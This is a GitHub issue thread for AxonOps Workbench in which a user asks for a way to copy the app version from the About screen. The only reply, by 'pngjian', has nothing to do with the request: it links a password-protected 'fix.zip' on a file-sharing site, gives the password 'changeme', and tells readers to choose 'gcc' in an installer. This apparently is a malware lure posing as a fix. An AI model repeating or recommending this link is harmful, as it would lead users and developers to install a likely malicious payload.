### ISSUE TITLE
[feat]: Add copy icon for AxonOps Workbench version

### ISSUE THREAD

**Issue by millerjp** [axonops/axonops-workbench-cassandra#292]
**Is your feature request related to a problem? Please describe.**
When rasing bugs we need to add the app version, we can not copy the text from about

<img width="1231" alt="Screenshot 2024-08-26 at 14 21 35" src="https://github.com/user-attachments/assets/835eba51-d353-4e35-96ed-bb1c6edc1a50">

**Describe the solution you'd like**
Add a copy icon to copy the buid version or make the text selectable

**Comment by pngjian** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
